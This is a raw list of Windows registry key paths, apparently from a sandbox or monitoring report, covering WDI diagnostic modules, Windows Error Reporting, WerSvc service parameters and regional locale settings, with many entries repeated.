HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NeverLowerPagePriority 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NeverLowerPagePriority 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NeverLowerPagePriority 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NeverLowerPagePriority 
Read Keys
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NameResource 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\ImagePath 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NeverLowerPagePriority 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NameResource 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\Config\ServerName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\CLResolutionInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\DisplayInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\SkipWatson HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\Settings\ReflectionInterval HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\WerSvcGroup HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName HKEY_USERS\.DEFAULT\Control Panel\International\sCountry HKEY_USERS\.DEFAULT\Control Panel\International\sList HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal HKEY_USERS\.DEFAULT\Control Panel\International\sThousand HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping HKEY_USERS\.DEFAULT\Control 
Panel\International\sPositiveSign HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime HKEY_USERS\.DEFAULT\Control Panel\International\s1159 HKEY_USERS\.DEFAULT\Control Panel\International\s2359 HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate HKEY_USERS\.DEFAULT\Control Panel\International\iCountry HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize HKEY_USERS\.DEFAULT\Control Panel\International\iDigits HKEY_USERS\.DEFAULT\Control Panel\International\iLZero HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber HKEY_USERS\.DEFAULT\Control Panel\International\NumShape HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters\ServiceDll HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters\ServiceManifest HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters\ServiceMain HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ServiceTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters\ServiceDllUnloadOnStop HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\NoReflection HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\Windows Error Reporting\NoReflection HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Category 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Name HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\ParentFolder HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Description HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\RelativePath HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\ParsingName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\InfoTip HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\LocalizedName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Icon HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Security HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\StreamResource HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\StreamResourceType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\LocalRedirectOnly HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Roamable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\PreCreate 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Stream HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\PublishExpandedPath HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Attributes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\FolderTypeID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\InitFolderHandler HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TraceFlags HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\NoReflection HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug\Debugger HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MachineID HKEY_CURRENT_USER\Control Panel\International\LocaleName HKEY_CURRENT_USER\Control Panel\International\sCountry HKEY_CURRENT_USER\Control Panel\International\sList HKEY_CURRENT_USER\Control Panel\International\sDecimal HKEY_CURRENT_USER\Control Panel\International\sThousand HKEY_CURRENT_USER\Control Panel\International\sGrouping HKEY_CURRENT_USER\Control Panel\International\sNativeDigits HKEY_CURRENT_USER\Control Panel\International\sCurrency HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep HKEY_CURRENT_USER\Control Panel\International\sMonGrouping HKEY_CURRENT_USER\Control Panel\International\sPositiveSign HKEY_CURRENT_USER\Control Panel\International\sNegativeSign HKEY_CURRENT_USER\Control Panel\International\sTimeFormat HKEY_CURRENT_USER\Control Panel\International\sShortTime HKEY_CURRENT_USER\Control 
